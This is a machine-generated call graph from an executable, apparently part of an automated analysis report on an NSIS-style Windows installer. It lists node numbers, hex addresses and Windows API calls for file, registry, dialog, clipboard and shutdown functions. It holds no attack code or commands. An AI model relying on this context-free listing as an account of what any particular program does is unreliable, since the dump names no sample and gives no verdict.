404688 5217->5226 5223 404621 5218->5223 5222 404ae8 SetDlgItemTextW 5222->5217 5224 4066df 21 API calls 5223->5224 5225 40462c SetDlgItemTextW 5224->5225 5225->5222 5227 40474b 5226->5227 5228 4046a0 GetWindowLongW 5226->5228 5228->5227 5229 4046b5 5228->5229 5229->5227 5230 4046e2 GetSysColor 5229->5230 5231 4046e5 5229->5231 5230->5231 5232 4046f5 SetBkMode 5231->5232 5233 4046eb SetTextColor 5231->5233 5234 404713 5232->5234 5235 40470d GetSysColor 5232->5235 5233->5232 5236 404724 5234->5236 5237 40471a SetBkColor 5234->5237 5235->5234 5236->5227 5238 404737 DeleteObject 5236->5238 5239 40473e CreateBrushIndirect 5236->5239 5237->5236 5238->5239 5239->5227 5243 7433103d 5246 7433101b 5243->5246 5253 743315b6 5246->5253 5248 74331020 5249 74331027 GlobalAlloc 5248->5249 5250 74331024 5248->5250 5249->5250 5251 743315dd 3 API calls 5250->5251 5252 7433103b 5251->5252 5255 743315bc 5253->5255 5254 743315c2 5254->5248 5255->5254 5256 743315ce GlobalFree 5255->5256 5256->5248 4836 40254f 4837 402e0b 21 API calls 4836->4837 4838 402559 4837->4838 4839 402dcb 21 API calls 4838->4839 4840 402562 4839->4840 4841 40256d RegQueryValueExW 4840->4841 4846 402953 4840->4846 4842 402593 RegCloseKey 4841->4842 4843 40258d 4841->4843 4842->4846 4843->4842 4847 4065e9 wsprintfW 4843->4847 4847->4842 4848 4021cf 4849 402dcb 21 API calls 4848->4849 4850 4021d6 4849->4850 4851 402dcb 21 API calls 4850->4851 4852 4021e0 4851->4852 4853 402dcb 21 API calls 4852->4853 4854 4021ea 4853->4854 4855 402dcb 21 API calls 4854->4855 4856 4021f4 4855->4856 4857 402dcb 21 API calls 4856->4857 4858 4021fe 4857->4858 4859 40223d CoCreateInstance 4858->4859 4860 402dcb 21 API calls 4858->4860 4863 40225c 4859->4863 4860->4859 4861 401423 28 API calls 4862 40231b 4861->4862 4863->4861 4863->4862 5257 40204f 5258 402dcb 21 API calls 5257->5258 5259 402056 5258->5259 5260 406a96 5 API calls 5259->5260 5261 402065 5260->5261 5262 402081 GlobalAlloc 5261->5262 5264 4020f1 5261->5264 5263 402095 5262->5263 5262->5264 5265 406a96 5 API calls 5263->5265 5266 40209c 5265->5266 5267 406a96 5 API calls 5266->5267 5268 4020a6 5267->5268 5268->5264 5272 4065e9 wsprintfW 5268->5272 5270 4020df 5273 4065e9 wsprintfW 5270->5273 5272->5270 5273->5264 5274 401a55 5275 402dcb 21 API calls 5274->5275 5276 401a5e ExpandEnvironmentStringsW 5275->5276 5277 401a72 5276->5277 5279 401a85 5276->5279 5278 401a77 lstrcmpW 5277->5278 5277->5279 5278->5279 4964 4023d7 4965 4023e5 4964->4965 4966 4023df 4964->4966 4968 4023f3 4965->4968 4970 402dcb 21 API calls 4965->4970 4967 402dcb 21 API calls 4966->4967 4967->4965 4969 402401 4968->4969 4971 402dcb 21 API calls 4968->4971 4972 402dcb 21 API calls 4969->4972 4970->4968 4971->4969 4973 40240a WritePrivateProfileStringW 4972->4973 4974 4014d7 4975 402da9 21 API calls 4974->4975 4976 4014dd Sleep 4975->4976 4978 402c4f 4976->4978 5280 404757 lstrcpynW lstrlenW 5286 402459 5287 402461 5286->5287 5288 40248c 5286->5288 5289 402e0b 21 API calls 5287->5289 5290 402dcb 21 API calls 5288->5290 5291 402468 5289->5291 5292 402493 5290->5292 5294 402dcb 21 API calls 5291->5294 5296 4024a0 5291->5296 5297 402e89 5292->5297 5295 402479 RegDeleteValueW RegCloseKey 5294->5295 5295->5296 5298 402e9d 5297->5298 5300 402e96 5297->5300 5298->5300 5301 402ece 5298->5301 5300->5296 5302 40650f RegOpenKeyExW 5301->5302 5303 402efc 5302->5303 5304 402f0c RegEnumValueW 5303->5304 5309 402f2f 5303->5309 5312 402fa6 5303->5312 5305 402f96 RegCloseKey 5304->5305 5304->5309 5305->5312 5306 402f6b RegEnumKeyW 5307 402f74 RegCloseKey 5306->5307 5306->5309 5308 406a96 5 API calls 5307->5308 5310 402f84 5308->5310 5309->5305 5309->5306 5309->5307 5311 402ece 6 API calls 5309->5311 5310->5312 5313 402f88 RegDeleteKeyW 5310->5313 5311->5309 5312->5300 5313->5312 5314 40175a 5315 402dcb 21 API calls 5314->5315 5316 401761 SearchPathW 5315->5316 5317 40177c 5316->5317 5318 401d5d 5319 402da9 21 API calls 5318->5319 5320 401d64 5319->5320 5321 402da9 21 API calls 5320->5321 5322 401d70 GetDlgItem 5321->5322 5323 40265d 5322->5323 5331 4047e0 5332 4047f8 5331->5332 5338 404912 5331->5338 5339 404621 22 API calls 5332->5339 5333 40497c 5334 404a46 5333->5334 5335 404986 GetDlgItem 5333->5335 5340 404688 8 API calls 5334->5340 5336 4049a0 5335->5336 5337 404a07 5335->5337 5336->5337 5343 4049c6 SendMessageW LoadCursorW SetCursor 5336->5343 5337->5334 5344 404a19 5337->5344 5338->5333 5338->5334 5341 40494d GetDlgItem SendMessageW 5338->5341 5342 40485f 5339->5342 5354 404a41 5340->5354 5364 404643 EnableWindow 5341->5364 5346 404621 22 API calls 5342->5346 5368 404a8f 5343->5368 5349 404a2f 5344->5349 5350 404a1f SendMessageW 5344->5350 5347 40486c CheckDlgButton 5346->5347 5362 404643 EnableWindow 5347->5362 5349->5354 5355 404a35 SendMessageW 5349->5355 5350->5349 5351 404977 5365 404a6b 5351->5365 5355->5354 5357 40488a GetDlgItem 5363 404656 SendMessageW 5357->5363 5359 4048a0 SendMessageW 5360 4048c6 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5359->5360 5361 4048bd GetSysColor 5359->5361 5360->5354 5361->5360 5362->5357 5363->5359 5364->5351 5366 404a79 5365->5366 5367 404a7e SendMessageW 5365->5367 5366->5367 5367->5333 5371 405cc8 ShellExecuteExW 5368->5371 5370 4049f5 LoadCursorW SetCursor 5370->5337 5371->5370 5372 402663 5373 402692 5372->5373 5374 402677 5372->5374 5376 4026c2 5373->5376 5377 402697 5373->5377 5375 402da9 21 API calls 5374->5375 5385 40267e 5375->5385 5379 402dcb 21 API calls 5376->5379 5378 402dcb 21 API calls 5377->5378 5380 40269e 5378->5380 5381 4026c9 lstrlenW 5379->5381 5389 4066c4 WideCharToMultiByte 5380->5389 5381->5385 5383 4026b2 lstrlenA 5383->5385 5384 40270c 5385->5384 5386 4026f6 5385->5386 5388 406273 5 API calls 5385->5388 5386->5384 5387 406244 WriteFile 5386->5387 5387->5384 5388->5386 5389->5383 4350 403665 SetErrorMode GetVersionExW 4351 4036f1 4350->4351 4352 4036b9 GetVersionExW 4350->4352 4353 403748 4351->4353 4354 406a96 5 API calls 4351->4354 4352->4351 4355 406a26 3 API calls 4353->4355 4354->4353 4356 40375e lstrlenA 4355->4356 4356->4353 4357 40376e 4356->4357 4358 406a96 5 API calls 4357->4358 4359 403775 4358->4359 4360 406a96 5 API calls 4359->4360 4361 40377c 4360->4361 4362 406a96 5 API calls 4361->4362 4366 403788 #17 OleInitialize SHGetFileInfoW 4362->4366 4365 4037d7 GetCommandLineW 4439 4066a2 lstrcpynW 4365->4439 4438 4066a2 lstrcpynW 4366->4438 4368 4037e9 4369 405f9e CharNextW 4368->4369 4370 40380f CharNextW 4369->4370 4379 403821 4370->4379 4371 403923 4372 403937 GetTempPathW 4371->4372 4440 403634 4372->4440 4374 40394f 4376 403953 GetWindowsDirectoryW lstrcatW 4374->4376 4377 4039a9 DeleteFileW 4374->4377 4375 405f9e CharNextW 4375->4379 4380 403634 12 API calls 4376->4380 4450 4030f5 GetTickCount GetModuleFileNameW 4377->4450 4379->4371 4379->4375 4385 403925 4379->4385 4382 40396f 4380->4382 4381 4039bd 4383 403a74 4381->4383 4387 403a64 4381->4387 4392 405f9e CharNextW 4381->4392 4382->4377 4384 403973 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4382->4384 4614 403c82 4383->4614 4389 403634 12 API calls 4384->4389 4537 4066a2 lstrcpynW 4385->4537 4480 403d74 4387->4480 4390 4039a1 4389->4390 4390->4377 4390->4383 4405 4039dc 4392->4405 4394 403bc2 4396 405d02 MessageBoxIndirectW 4394->4396 4395 403be6 4397 403c6a ExitProcess 4395->4397 4398 403bee GetCurrentProcess OpenProcessToken 4395->4398 4400 403bd0 ExitProcess 4396->4400 4401 403c06 LookupPrivilegeValueW AdjustTokenPrivileges 4398->4401 4402 403c3a 4398->4402 4401->4402 4407 406a96 5 API calls 4402->4407 4403 403a3a 4538 406079 4403->4538 4404 403a7d 4554 405c6d 4404->4554 4405->4403 4405->4404 4411 403c41 4407->4411 4413 403c56 ExitWindowsEx 4411->4413 4415 403c63 4411->4415 4413->4397 4413->4415 4623 40140b 4415->4623 4416 403a9c 4419 403ab4 4416->4419 4558 4066a2 lstrcpynW 4416->4558 4417 403a59 4553 4066a2 lstrcpynW 4417->4553 4422 403ada wsprintfW 4419->4422 4435 403b06 4419->4435 4423 4066df 21 API calls 4422->4423 4423->4419 4426 403b50 SetCurrentDirectoryW 4604 406462 MoveFileExW 4426->4604 4427 403b16 GetFileAttributesW 4429 403b22 DeleteFileW 4427->4429 4427->4435 4429->4435 4432 406462 40 API calls 4432->4435 4433 4066df 21 API calls 4433->4435 4435->4383 4435->4419 4435->4422 4435->4426 4435->4427 4435->4432 4435->4433 4436 403bd8 CloseHandle 4435->4436 4559 405bf6 CreateDirectoryW 4435->4559 4562 405c50 CreateDirectoryW 4435->4562 4565 405dae 4435->4565 4608 405c85 CreateProcessW 4435->4608 4611 4069ff FindFirstFileW 4435->4611 4436->4383 4438->4365 4439->4368 4441 406950 5 API calls 4440->4441 4443 403640 4441->4443 4442 40364a 4442->4374 4443->4442 4626 405f71 lstrlenW CharPrevW 4443->4626 4446 405c50 2 API calls 4447 403658 4446->4447 4448 4061c1 2 API calls 4447->4448 4449 403663 4448->4449 4449->4374 4629 406192 GetFileAttributesW CreateFileW 4450->4629 4452 403138 4453 403145 4452->4453 4630 4066a2 lstrcpynW 4452->4630 4453->4381 4455 40315b 4631 405fbd lstrlenW 4455->4631 4459 40316c GetFileSize 4460 403266 4459->4460 4474 403183 4459->4474 4636 403053 4460->4636 4464 4032ab GlobalAlloc 4467 4032c2 4464->4467 4466 403303 4469 403053 36 API calls 4466->4469 4471 4061c1 2 API calls 4467->4471 4468 40328c 4470 403607 ReadFile 4468->4470 4469->4453 4472 403297 4470->4472 4475 4032d3 CreateFileW 4471->4475 4472->4453 4472->4464 4473 403053 36 API calls 4473->4474 4474->4453 4474->4460 4474->4466 4474->4473 4667 403607 4474->4667 4475->4453 4476 40330d 4475->4476 4651 40361d SetFilePointer 4476->4651 4478 40331b 4652 403396 4478->4652 4481 406a96 5 API calls 4480->4481 4482 403d88 4481->4482 4483 403da0 4482->4483 4484 403d8e 4482->4484 4485 406570 3 API calls 4483->4485 4722 4065e9 wsprintfW 4484->4722 4486 403dd0 4485->4486 4488 403def lstrcatW 4486->4488 4490 406570 3 API calls 4486->4490 4489 403d9e 4488->4489 4714 40404a 4489->4714 4490->4488 4493 406079 18 API calls 4494 403e21 4493->4494 4495 403eb5 4494->4495 4497 406570 3 API calls 4494->4497 4496 406079 18 API calls 4495->4496 4498 403ebb 4496->4498 4499 403e53 4497->4499 4500 403ecb LoadImageW 4498->4500 4501 4066df 21 API calls 4498->4501 4499->4495 4504 403e74 lstrlenW 4499->4504 4508 405f9e CharNextW 4499->4508 4502 403f71 4500->4502 4503 403ef2 RegisterClassW 4500->4503 4501->4500 4507 40140b 2 API calls 4502->4507 4505 403f7b 4503->4505 4506 403f28 SystemParametersInfoW CreateWindowExW 4503->4506 4509 403e82 lstrcmpiW 4504->4509 4510 403ea8 4504->4510 4505->4383 4506->4502 4511 403f77 4507->4511 4513 403e71 4508->4513 4509->4510 4514 403e92 GetFileAttributesW 4509->4514 4512 405f71 3 API calls 4510->4512 4511->4505 4515 40404a 22 API calls 4511->4515 4516 403eae 4512->4516 4513->4504 4517 403e9e 4514->4517 4518 403f88 4515->4518 4723 4066a2 lstrcpynW 4516->4723 4517->4510 4520 405fbd 2 API calls 4517->4520 4521 403f94 ShowWindow 4518->4521 4522 404017 4518->4522 4520->4510 4523 406a26 3 API calls 4521->4523 4724 4057fa OleInitialize 4522->4724 4526 403fac 4523->4526 4525 40401d 4527 404021 4525->4527 4528 404039 4525->4528 4529 403fba GetClassInfoW 4526->4529 4531 406a26 3 API calls 4526->4531 4527->4505 4534 40140b 2 API calls 4527->4534 4530 40140b 2 API calls 4528->4530 4532 403fe4 DialogBoxParamW 4529->4532 4533 403fce GetClassInfoW RegisterClassW 4529->4533 4530->4505 4531->4529 4535 40140b 2 API calls 4532->4535 4533->4532 4534->4505 4536 40400c 4535->4536 4536->4505 4537->4372 4742 4066a2 lstrcpynW 4538->4742 4540 40608a 4743 40601c CharNextW CharNextW 4540->4743 4543 403a46 4543->4383 4552 4066a2 lstrcpynW 4543->4552 4544 406950 5 API calls 4550 4060a0 4544->4550 4545 4060d1 lstrlenW 4546 4060dc 4545->4546 4545->4550 4547 405f71 3 API calls 4546->4547 4549 4060e1 GetFileAttributesW 4547->4549 4548 4069ff 2 API calls 4548->4550 4549->4543 4550->4543 4550->4545 4550->4548 4551 405fbd 2 API calls 4550->4551 4551->4545 4552->4417 4553->4387 4555 406a96 5 API calls 4554->4555 4556 403a82 lstrlenW 4555->4556 4557 4066a2 lstrcpynW 4556->4557 4557->4416 4558->4419 4560 405c42 4559->4560 4561 405c46 GetLastError 4559->4561 4560->4435 4561->4560 4563 405c60 4562->4563 4564 405c64 GetLastError 4562->4564 4563->4435 4564->4563 4566 406079 18 API calls 4565->4566 4567 405dce 4566->4567 4568 405dd6 DeleteFileW 4567->4568 4570 405ded 4567->4570 4575 405f24 4568->4575 4569 405f18 4569->4575 4578 4069ff 2 API calls 4569->4578 4570->4569 4749 4066a2 lstrcpynW 4570->4749 4572 405e13 4573 405e26 4572->4573 4574 405e19 lstrcatW 4572->4574 4577 405fbd 2 API calls 4573->4577 4576 405e2c 4574->4576 4575->4435 4579 405e3c lstrcatW 4576->4579 4581 405e47 lstrlenW FindFirstFileW 4576->4581 4577->4576 4580 405f32 4578->4580 4579->4581 4580->4575 4582 405f36 4580->4582 4583 405f0d 4581->4583 4602 405e69 4581->4602 4584 405f71 3 API calls 4582->4584 4583->4569 4585 405f3c 4584->4585 4586 405d66 5 API calls 4585->4586 4589 405f48 4586->4589 4588 405ef0 FindNextFileW 4590 405f06 FindClose 4588->4590 4588->4602 4591 405f62 4589->4591 4592 405f4c 4589->4592 4590->4583 4594 405727 28 API calls 4591->4594 4592->4575 4595 405727 28 API calls 4592->4595 4594->4575 4597 405f59 4595->4597 4596 405dae 64 API calls 4596->4602 4599 406462 40 API calls 4597->4599 4598 405727 28 API calls 4598->4588 4600 405f60 4599->4600 4600->4575 4601 405727 28 API calls 4601->4602 4602->4588 4602->4596 4602->4598 4602->4601 4603 406462 40 API calls 4602->4603 4750 4066a2 lstrcpynW 4602->4750 4751 405d66 4602->4751 4603->4602 4605 403b5f CopyFileW 4604->4605 4606 406476 4604->4606 4605->4383 4605->4435 4762 4062e8 4606->4762 4609 405cc4 4608->4609 4610 405cb8 CloseHandle 4608->4610 4609->4435 4610->4609 4612 406a20 4611->4612 4613 406a15 FindClose 4611->4613 4612->4435 4613->4612 4615 403c93 CloseHandle 4614->4615 4616 403c9d 4614->4616 4615->4616 4617 403cb1 4616->4617 4618 403ca7 CloseHandle 4616->4618 4796 403cdf 4617->4796 4618->4617 4621 405dae 71 API calls 4622 403bb5 OleUninitialize 4621->4622 4622->4394 4622->4395 4624 401389 2 API calls 4623->4624 4625 401420 4624->4625 4625->4397 4627 403652 4626->4627 4628 405f8d lstrcatW 4626->4628 4627->4446 4628->4627 4629->4452 4630->4455 4632 405fcb 4631->4632 4633 405fd1 CharPrevW 4632->4633 4634 403161 4632->4634 4633->4632 4633->4634 4635 4066a2 lstrcpynW 4634->4635 4635->4459 4637 403064 4636->4637 4638 40307c 4636->4638 4639 403074 4637->4639 4640 40306d DestroyWindow 4637->4640 4641 403084 4638->4641 4642 40308c GetTickCount 4638->4642 4639->4453 4639->4464 4670 40361d SetFilePointer 4639->4670 4640->4639 4671 406ad2 4641->4671 4642->4639 4644 40309a 4642->4644 4645 4030a2 4644->4645 4646 4030cf CreateDialogParamW ShowWindow 4644->4646 4645->4639 4675 403037 4645->4675 4646->4639 4648 4030b0 wsprintfW 4678 405727 4648->4678 4651->4478 4653 4033c1 4652->4653 4654 4033a5 SetFilePointer 4652->4654 4689 40349e GetTickCount 4653->4689 4654->4653 4659 40349e 46 API calls 4660 4033f8 4659->4660 4661 40345e 4660->4661 4662 403464 ReadFile 4660->4662 4664 403407 4660->4664 4661->4453 4662->4661 4664->4661 4665 406215 ReadFile 4664->4665 4704 406244 WriteFile 4664->4704 4665->4664 4668 406215 ReadFile 4667->4668 4669 40361a 4668->4669 4669->4474 4670->4468 4672 406aef PeekMessageW 4671->4672 4673 406ae5 DispatchMessageW 4672->4673 4674 406aff 4672->4674 4673->4672 4674->4639 4676 403046 4675->4676 4677 403048 MulDiv 4675->4677 4676->4677 4677->4648 4679 405742 4678->4679 4688 4030cd 4678->4688 4680 40575e lstrlenW 4679->4680 4681 4066df 21 API calls 4679->4681 4682 405787 4680->4682 4683 40576c lstrlenW 4680->4683 4681->4680 4685 40579a 4682->4685 4686 40578d SetWindowTextW 4682->4686 4684 40577e lstrcatW 4683->4684 4683->4688 4684->4682 4687 4057a0 SendMessageW SendMessageW SendMessageW 4685->4687 4685->4688 4686->4685 4687->4688 4688->4639 4690 4035f6 4689->4690 4691 4034cc 4689->4691 4692 403053 36 API calls 4690->4692 4706 40361d SetFilePointer 4691->4706 4698 4033c8 4692->4698 4694 4034d7 SetFilePointer 4700 4034fc 4694->4700 4695 403607 ReadFile 4695->4700 4697 403053 36 API calls 4697->4700 4698->4661 4702 406215 ReadFile 4698->4702 4699 406244 WriteFile 4699->4700 4700->4695 4700->4697 4700->4698 4700->4699 4701 4035d7 SetFilePointer 4700->4701 4707 406c11 4700->4707 4701->4690 4703 4033e1 4702->4703 4703->4659 4703->4661 4705 406262 4704->4705 4705->4664 4706->4694 4708 406c36 4707->4708 4709 406c3e 4707->4709 4708->4700 4709->4708 4710 406cc5 GlobalFree 4709->4710 4711 406cce GlobalAlloc 4709->4711 4712 406d45 GlobalAlloc 4709->4712 4713 406d3c GlobalFree 4709->4713 4710->4711 4711->4708 4711->4709 4712->4708 4712->4709 4713->4712 4715 40405e 4714->4715 4731 4065e9 wsprintfW 4715->4731 4717 4040cf 4732 404103 4717->4732 4719 403dff 4719->4493 4720 4040d4 4720->4719 4721 4066df 21 API calls 4720->4721 4721->4720 4722->4489 4723->4495 4735 40466d 4724->4735 4726 40581d 4730 405844 4726->4730 4738 401389 4726->4738 4727 40466d SendMessageW 4728 405856 OleUninitialize 4727->4728 4728->4525 4730->4727 4731->4717 4733 4066df 21 API calls 4732->4733 4734 404111 SetWindowTextW 4733->4734 4734->4720 4736 404685 4735->4736 4737 404676 SendMessageW 4735->4737 4736->4726 4737->4736 4740 401390 4738->4740 4739 4013fe 4739->4726 4740->4739 4741 4013cb MulDiv SendMessageW 4740->4741 4741->4740 4742->4540 4744 406039 4743->4744 4747 40604b 4743->4747 4746 406046 CharNextW 4744->4746 4744->4747 4745 40606f 4745->4543 4745->4544 4746->4745 4747->4745 4748 405f9e CharNextW 4747->4748 4748->4747 4749->4572 4750->4602 4759 40616d GetFileAttributesW 4751->4759 4754 405d93 4754->4602 4755 405d81 RemoveDirectoryW 4757 405d8f 4755->4757 4756 405d89 DeleteFileW 4756->4757 4757->4754 4758 405d9f SetFileAttributesW 4757->4758 4758->4754 4760 405d72 4759->4760 4761 40617f SetFileAttributesW 4759->4761 4760->4754 4760->4755 4760->4756 4761->4760 4763 406318 4762->4763 4764 40633e GetShortPathNameW 4762->4764 4789 406192 GetFileAttributesW CreateFileW 4763->4789 4765 406353 4764->4765 4766 40645d 4764->4766 4765->4766 4769 40635b wsprintfA 4765->4769 4766->4605 4768 406322 CloseHandle GetShortPathNameW 4768->4766 4770 406336 4768->4770 4771 4066df 21 API calls 4769->4771 4770->4764 4770->4766 4772 406383 4771->4772 4790 406192 GetFileAttributesW CreateFileW 4772->4790 4774 406390 4774->4766 4775 40639f GetFileSize GlobalAlloc 4774->4775 4776 4063c1 4775->4776 4777 406456 CloseHandle 4775->4777 4778 406215 ReadFile 4776->4778 4777->4766 4779 4063c9 4778->4779 4779->4777 4791 4060f7 lstrlenA 4779->4791 4782 4063e0 lstrcpyA 4785 406402 4782->4785 4783 4063f4 4784 4060f7 4 API calls 4783->4784 4784->4785 4786 406439 SetFilePointer 4785->4786 4787 406244 WriteFile 4786->4787 4788 40644f GlobalFree 4787->4788 4788->4777 4789->4768 4790->4774 4792 406138 lstrlenA 4791->4792 4793 406140 4792->4793 4794 406111 lstrcmpiA 4792->4794 4793->4782 4793->4783 4794->4793 4795 40612f CharNextA 4794->4795 4795->4792 4797 403ced 4796->4797 4798 403cb6 4797->4798 4799 403cf2 FreeLibrary GlobalFree 4797->4799 4798->4621 4799->4798 4799->4799 4806 4015e6 4807 402dcb 21 API calls 4806->4807 4808 4015ed 4807->4808 4809 40601c 4 API calls 4808->4809 4814 4015f6 4809->4814 4810 401656 4812 401688 4810->4812 4813 40165b 4810->4813 4811 405f9e CharNextW 4811->4814 4816 401423 28 API calls 4812->4816 4825 401423 4813->4825 4814->4810 4814->4811 4818 405c50 2 API calls 4814->4818 4821 405c6d 5 API calls 4814->4821 4823 40163c GetFileAttributesW 4814->4823 4824 405bf6 2 API calls 4814->4824 4819 401680 4816->4819 4818->4814 4821->4814 4822 40166f SetCurrentDirectoryW 4822->4819 4823->4814 4824->4814 4826 405727 28 API calls 4825->4826 4827 401431 4826->4827 4828 4066a2 lstrcpynW 4827->4828 4828->4822 5390 405866 5391 405a10 5390->5391 5392 405887 GetDlgItem GetDlgItem GetDlgItem 5390->5392 5394 405a41 5391->5394 5395 405a19 GetDlgItem CreateThread CloseHandle 5391->5395 5435 404656 SendMessageW 5392->5435 5397 405a6c 5394->5397 5399 405a91 5394->5399 5400 405a58 ShowWindow ShowWindow 5394->5400 5395->5394 5396 4058f7 5404 4058fe GetClientRect GetSystemMetrics SendMessageW SendMessageW 5396->5404 5398 405acc 5397->5398 5401 405a80 5397->5401 5402 405aa6 ShowWindow 5397->5402 5398->5399 5412 405ada SendMessageW 5398->5412 5403 404688 8 API calls 5399->5403 5437 404656 SendMessageW 5400->5437 5438 4045fa 5401->5438 5408 405ac6 5402->5408 5409 405ab8 5402->5409 5407 405a9f 5403->5407 5410 405950 SendMessageW SendMessageW 5404->5410 5411 40596c 5404->5411 5414 4045fa SendMessageW 5408->5414 5413 405727 28 API calls 5409->5413 5410->5411 5415 405971 SendMessageW 5411->5415 5416 40597f 5411->5416 5412->5407 5417 405af3 CreatePopupMenu 5412->5417 5413->5408 5414->5398 5415->5416 5419 404621 22 API calls 5416->5419 5418 4066df 21 API calls 5417->5418 5420 405b03 AppendMenuW 5418->5420 5421 40598f 5419->5421 5422 405b20 GetWindowRect 5420->5422 5423 405b33 TrackPopupMenu 5420->5423 5424 405998 ShowWindow 5421->5424 5425 4059cc GetDlgItem SendMessageW 5421->5425 5422->5423 5423->5407 5426 405b4e 5423->5426 5427 4059bb 5424->5427 5428 4059ae ShowWindow 5424->5428 5425->5407 5429 4059f3 SendMessageW SendMessageW 5425->5429 5430 405b6a SendMessageW 5426->5430 5436 404656 SendMessageW 5427->5436 5428->5427 5429->5407 5430->5430 5431 405b87 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 5430->5431 5433 405bac SendMessageW 5431->5433 5433->5433 5434 405bd5 GlobalUnlock SetClipboardData CloseClipboard 5433->5434 5434->5407 5435->5396 5436->5425 5437->5397 5439 404601 5438->5439 5440 404607 SendMessageW 5438->5440 5439->5440 5440->5399 5441 404e68 5442 404e94 5441->5442 5443 404e78 5441->5443 5445 404ec7 5442->5445 5446 404e9a SHGetPathFromIDListW 5442->5446 5452 405ce6 GetDlgItemTextW 5443->5452 5448 404eb1 SendMessageW 5446->5448 5449 404eaa 5446->5449 5447 404e85 SendMessageW 5447->5442 5448->5445 5450 40140b 2 API calls 5449->5450 5450->5448 5452->5447 5453 401c68 5454 402da9 21 API calls 5453->5454 5455 401c6f 5454->5455 5456 402da9 21 API calls 5455->5456 5457 401c7c 5456->5457 5458 401c91 5457->5458 5459 402dcb 21 API calls 5457->5459 5460 401ca1 5458->5460 5461 402dcb 21 API calls 5458->5461 5459->5458 5462 401cf8 5460->5462 5463 401cac 5460->5463 5461->5460 5464 402dcb 21 API calls 5462->5464 5465 402da9 21 API calls 5463->5465 5466 401cfd 5464->5466 5467 401cb1 5465->5467 5468 402dcb 21 API calls 5466->5468 5469 402da9 21 API calls 5467->5469 5471 401d06 FindWindowExW 5468->5471 5470 401cbd 5469->5470 5472 401ce8 SendMessageW 5470->5472 5473 401cca SendMessageTimeoutW 5470->5473 5474 401d28 5471->5474 5472->5474 5473->5474 5475 4028e9 5476 4028ef 5475->5476 5477 4028f7 FindClose 5476->5477 5478 402c4f 5476->5478 5477->5478 5479 4016f1 5480 402dcb 21 API calls 5479->5480 5481 4016f7 GetFullPathNameW 5480->5481 5482 401711 5481->5482 5483 401733 5481->5483 5482->5483 5486 4069ff 2 API calls 5482->5486 5484 401748 GetShortPathNameW 5483->5484 5485 402c4f 5483->5485 5484->5485 5487 401723 5486->5487 5487->5483 5489 4066a2 lstrcpynW 5487->5489 5489->5483 5490 74331000 5491 7433101b 5 API calls 5490->5491 5492 74331019 5491->5492 5493 401e73 GetDC 5494 402da9 21 API calls 5493->5494 5495 401e85 GetDeviceCaps MulDiv ReleaseDC 5494->5495 5496 402da9 21 API calls 5495->5496 5497 401eb6 5496->5497 5498 4066df 21 API calls 5497->5498 5499 401ef3 CreateFontIndirectW 5498->5499 5500 40265d 5499->5500 5501 402975 5502 402dcb 21 API calls 5501->5502 5503 402981 5502->5503 5504 402997 5503->5504 5506 402dcb 21 API calls 5503->5506 5505 40616d 2 API calls 5504->5505 5507 40299d 5505->5507 5506->5504 5529 406192 GetFileAttributesW CreateFileW 5507->5529 5509 4029aa 5510 402a60 5509->5510 5511 4029c5 GlobalAlloc 5509->5511 5512 402a48 5509->5512 5513 402a67 DeleteFileW 5510->5513 5514 402a7a 5510->5514 5511->5512 5515 4029de 5511->5515 5516 403396 48 API calls 5512->5516 5513->5514 5530 40361d SetFilePointer 5515->5530 5518 402a55 CloseHandle 5516->5518 5518->5510 5519 4029e4 5520 403607 ReadFile 5519->5520 5521 4029ed GlobalAlloc 5520->5521 5522 402a31 5521->5522 5523 4029fd 5521->5523 5524 406244 WriteFile 5522->5524 5525 403396 48 API calls 5523->5525 5526 402a3d GlobalFree 5524->5526 5528 402a0a 5525->5528 5526->5512 5527 402a28 GlobalFree 5527->5522 5528->5527 5529->5509 5530->5519 5531 4014f5 SetForegroundWindow 5532 402c4f 5531->5532 5547 40197b 5548 402dcb 21 API calls 5547->5548 5549 401982 lstrlenW 5548->5549 5550 40265d 5549->5550 4979 4020fd 4980 40210f 4979->4980 4990 4021c1 4979->4990 4981 402dcb 21 API calls 4980->4981 4983 402116 4981->4983 4982 401423 28 API calls 4986 40231b 4982->4986 4984 402dcb 21 API calls 4983->4984 4985 40211f 4984->4985 4987 402135 LoadLibraryExW 4985->4987 4988 402127 GetModuleHandleW 4985->4988 4989 402146 4987->4989 4987->4990 4988->4987 4988->4989 5002 406b05 4989->5002 4990->4982 4993 402190 4997 405727 28 API calls 4993->4997 4994 402157 4995 402176 4994->4995 4996 40215f 4994->4996 5007 74331817 4995->5007 4998 401423 28 API calls 4996->4998 4999 402167 4997->4999 4998->4999 4999->4986 5000 4021b3 FreeLibrary 4999->5000 5000->4986 5049 4066c4 WideCharToMultiByte 5002->5049 5004 406b22 5005 406b29 GetProcAddress 5004->5005 5006 402151 5004->5006 5005->5006 5006->4993 5006->4994 5008 7433184a 5007->5008 5050 74331bff 5008->5050 5010 74331851 5011 74331976 5010->5011 5012 74331862 5010->5012 5013 74331869 5010->5013 5011->4999 5100 7433243e 5012->5100 5084 74332480 5013->5084 5018 7433188e 5019 743318af 5018->5019 5020 743318cd 5018->5020 5113 74332655 5019->5113 5024 743318d3 5020->5024 5025 7433191e 5020->5025 5022 7433187f 5023 74331885 5022->5023 5028 74331890 5022->5028 5023->5018 5094 74332b98 5023->5094 5132 74331666 5024->5132 5032 74332655 10 API calls 5025->5032 5026 74331898 5026->5018 5110 74332e23 5026->5110 5027 743318b5 5124 74331654 5027->5124 5104 74332810 5028->5104 5036 7433190f 5032->5036 5040 74331965 5036->5040 5138 74332618 5036->5138 5038 74331896 5038->5018 5039 74332655 10 API calls 5039->5036 5040->5011 5044 7433196f GlobalFree 5040->5044 5044->5011 5046 74331951 5046->5040 5142 743315dd wsprintfW 5046->5142 5047 7433194a FreeLibrary 5047->5046 5049->5004 5145 743312bb GlobalAlloc 5050->5145 5052 74331c26 5146 743312bb GlobalAlloc 5052->5146 5054 74331e6b GlobalFree GlobalFree GlobalFree 5055 74331e88 5054->5055 5075 74331ed2 5054->5075 5057 7433227e 5055->5057 5063 74331e9d 5055->5063 5055->5075 5056 74331d26 GlobalAlloc 5069 74331c31 5056->5069 5058 743322a0 GetModuleHandleW 5057->5058 5057->5075 5061 743322b1 LoadLibraryW 5058->5061 5062 743322c6 5058->5062 5059 74331d71 lstrcpyW 5065 74331d7b lstrcpyW 5059->5065 5060 74331d8f GlobalFree 5060->5069 5061->5062 5061->5075 5153 743316bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte 